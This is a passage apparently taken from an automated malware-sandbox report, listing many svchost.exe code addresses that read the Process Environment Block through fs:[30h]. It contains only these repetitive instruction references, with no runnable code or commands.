            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03428397 mov eax, dword ptr fs:[00000030h]8_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03428397 mov eax, dword ptr fs:[00000030h]8_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034533A5 mov eax, dword ptr fs:[00000030h]8_2_034533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034633A0 mov eax, dword ptr fs:[00000030h]8_2_034633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034633A0 mov eax, dword ptr fs:[00000030h]8_2_034633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429240 mov eax, dword ptr fs:[00000030h]8_2_03429240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429240 mov eax, dword ptr fs:[00000030h]8_2_03429240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346724D mov eax, dword ptr fs:[00000030h]8_2_0346724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342A250 mov eax, dword ptr fs:[00000030h]8_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EB256 mov eax, dword ptr fs:[00000030h]8_2_034EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EB256 mov eax, dword ptr fs:[00000030h]8_2_034EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03436259 mov eax, dword ptr fs:[00000030h]8_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03434260 mov eax, dword ptr fs:[00000030h]8_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03434260 mov eax, dword ptr fs:[00000030h]8_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03434260 mov eax, dword ptr fs:[00000030h]8_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FD26B mov eax, dword ptr fs:[00000030h]8_2_034FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FD26B mov eax, dword ptr fs:[00000030h]8_2_034FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342826B mov eax, dword ptr fs:[00000030h]8_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03459274 mov eax, dword ptr fs:[00000030h]8_2_03459274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03471270 mov eax, dword ptr fs:[00000030h]8_2_03471270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03471270 mov eax, dword ptr fs:[00000030h]8_2_03471270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03467208 mov eax, dword ptr fs:[00000030h]8_2_03467208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03467208 mov eax, dword ptr fs:[00000030h]8_2_03467208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03505227 mov eax, dword ptr fs:[00000030h]8_2_03505227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342823B mov eax, dword ptr fs:[00000030h]8_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A2C3 mov eax, dword ptr fs:[00000030h]8_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A2C3 mov eax, dword ptr fs:[00000030h]8_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A2C3 mov eax, dword ptr fs:[00000030h]8_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A2C3 mov eax, dword ptr fs:[00000030h]8_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A2C3 mov eax, dword ptr fs:[00000030h]8_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034392C5 mov eax, dword ptr fs:[00000030h]8_2_034392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034392C5 mov eax, dword ptr fs:[00000030h]8_2_034392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B2D3 mov eax, dword ptr fs:[00000030h]8_2_0342B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B2D3 mov eax, dword ptr fs:[00000030h]8_2_0342B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B2D3 mov eax, dword ptr fs:[00000030h]8_2_0342B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345F2D0 mov eax, dword ptr fs:[00000030h]8_2_0345F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345F2D0 mov eax, dword ptr fs:[00000030h]8_2_0345F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034402E1 mov eax, dword ptr fs:[00000030h]8_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034402E1 mov eax, dword ptr fs:[00000030h]8_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034402E1 mov eax, dword ptr fs:[00000030h]8_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035052E2 mov eax, dword ptr fs:[00000030h]8_2_035052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EF2F8 mov eax, dword ptr fs:[00000030h]8_2_034EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034292FF mov eax, dword ptr fs:[00000030h]8_2_034292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346E284 mov eax, dword ptr fs:[00000030h]8_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346E284 mov eax, dword ptr fs:[00000030h]8_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B0283 mov eax, dword ptr fs:[00000030h]8_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B0283 mov eax, dword ptr fs:[00000030h]8_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B0283 mov eax, dword ptr fs:[00000030h]8_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03505283 mov eax, dword ptr fs:[00000030h]8_2_03505283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346329E mov eax, dword ptr fs:[00000030h]8_2_0346329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346329E mov eax, dword ptr fs:[00000030h]8_2_0346329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034452A0 mov eax, dword ptr fs:[00000030h]8_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034452A0 mov eax, dword ptr fs:[00000030h]8_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034452A0 mov eax, dword ptr fs:[00000030h]8_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034452A0 mov eax, dword ptr fs:[00000030h]8_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F92A6 mov eax, dword ptr fs:[00000030h]8_2_034F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F92A6 mov eax, dword ptr fs:[00000030h]8_2_034F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F92A6 mov eax, dword ptr fs:[00000030h]8_2_034F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F92A6 mov eax, dword ptr fs:[00000030h]8_2_034F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C62A0 mov eax, dword ptr fs:[00000030h]8_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C62A0 mov ecx, dword ptr fs:[00000030h]8_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C62A0 mov eax, dword ptr fs:[00000030h]8_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C62A0 mov eax, dword ptr fs:[00000030h]8_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C62A0 mov eax, dword ptr fs:[00000030h]8_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C62A0 mov eax, dword ptr fs:[00000030h]8_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C72A0 mov eax, dword ptr fs:[00000030h]8_2_034C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C72A0 mov eax, dword ptr fs:[00000030h]8_2_034C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B92BC mov eax, dword ptr fs:[00000030h]8_2_034B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B92BC mov eax, dword ptr fs:[00000030h]8_2_034B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B92BC mov ecx, dword ptr fs:[00000030h]8_2_034B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B92BC mov ecx, dword ptr fs:[00000030h]8_2_034B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03505152 mov eax, dword ptr fs:[00000030h]8_2_03505152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C4144 mov eax, dword ptr fs:[00000030h]8_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C4144 mov eax, dword ptr fs:[00000030h]8_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C4144 mov ecx, dword ptr fs:[00000030h]8_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C4144 mov eax, dword ptr fs:[00000030h]8_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C4144 mov eax, dword ptr fs:[00000030h]8_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429148 mov eax, dword ptr fs:[00000030h]8_2_03429148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429148 mov eax, dword ptr fs:[00000030h]8_2_03429148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429148 mov eax, dword ptr fs:[00000030h]8_2_03429148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429148 mov eax, dword ptr fs:[00000030h]8_2_03429148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03437152 mov eax, dword ptr fs:[00000030h]8_2_03437152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342C156 mov eax, dword ptr fs:[00000030h]8_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03436154 mov eax, dword ptr fs:[00000030h]8_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03436154 mov eax, dword ptr fs:[00000030h]8_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C9179 mov eax, dword ptr fs:[00000030h]8_2_034C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034DA118 mov ecx, dword ptr fs:[00000030h]8_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034DA118 mov eax, dword ptr fs:[00000030h]8_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034DA118 mov eax, dword ptr fs:[00000030h]8_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034DA118 mov eax, dword ptr fs:[00000030h]8_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F0115 mov eax, dword ptr fs:[00000030h]8_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03460124 mov eax, dword ptr fs:[00000030h]8_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03431131 mov eax, dword ptr fs:[00000030h]8_2_03431131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03431131 mov eax, dword ptr fs:[00000030h]8_2_03431131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B136 mov eax, dword ptr fs:[00000030h]8_2_0342B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B136 mov eax, dword ptr fs:[00000030h]8_2_0342B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B136 mov eax, dword ptr fs:[00000030h]8_2_0342B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B136 mov eax, dword ptr fs:[00000030h]8_2_0342B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F61C3 mov eax, dword ptr fs:[00000030h]8_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F61C3 mov eax, dword ptr fs:[00000030h]8_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346D1D0 mov eax, dword ptr fs:[00000030h]8_2_0346D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346D1D0 mov ecx, dword ptr fs:[00000030h]8_2_0346D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035051CB mov eax, dword ptr fs:[00000030h]8_2_035051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034351ED mov eax, dword ptr fs:[00000030h]8_2_034351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035061E5 mov eax, dword ptr fs:[00000030h]8_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034601F8 mov eax, dword ptr fs:[00000030h]8_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03470185 mov eax, dword ptr fs:[00000030h]8_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EC188 mov eax, dword ptr fs:[00000030h]8_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EC188 mov eax, dword ptr fs:[00000030h]8_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B019F mov eax, dword ptr fs:[00000030h]8_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B019F mov eax, dword ptr fs:[00000030h]8_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B019F mov eax, dword ptr fs:[00000030h]8_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B019F mov eax, dword ptr fs:[00000030h]8_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342A197 mov eax, dword ptr fs:[00000030h]8_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342A197 mov eax, dword ptr fs:[00000030h]8_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342A197 mov eax, dword ptr fs:[00000030h]8_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03487190 mov eax, dword ptr fs:[00000030h]8_2_03487190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E11A4 mov eax, dword ptr fs:[00000030h]8_2_034E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E11A4 mov eax, dword ptr fs:[00000030h]8_2_034E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E11A4 mov eax, dword ptr fs:[00000030h]8_2_034E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E11A4 mov eax, dword ptr fs:[00000030h]8_2_034E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344B1B0 mov eax, dword ptr fs:[00000030h]8_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03432050 mov eax, dword ptr fs:[00000030h]8_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034D705E mov ebx, dword ptr fs:[00000030h]8_2_034D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034D705E mov eax, dword ptr fs:[00000030h]8_2_034D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B052 mov eax, dword ptr fs:[00000030h]8_2_0345B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03505060 mov eax, dword ptr fs:[00000030h]8_2_03505060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov ecx, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345C073 mov eax, dword ptr fs:[00000030h]8_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034AD070 mov ecx, dword ptr fs:[00000030h]8_2_034AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E016 mov eax, dword ptr fs:[00000030h]8_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E016 mov eax, dword ptr fs:[00000030h]8_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E016 mov eax, dword ptr fs:[00000030h]8_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E016 mov eax, dword ptr fs:[00000030h]8_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342A020 mov eax, dword ptr fs:[00000030h]8_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342C020 mov eax, dword ptr fs:[00000030h]8_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F903E mov eax, dword ptr fs:[00000030h]8_2_034F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F903E mov eax, dword ptr fs:[00000030h]8_2_034F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F903E mov eax, dword ptr fs:[00000030h]8_2_034F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F903E mov eax, dword ptr fs:[00000030h]8_2_034F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov ecx, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov ecx, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov ecx, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov ecx, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
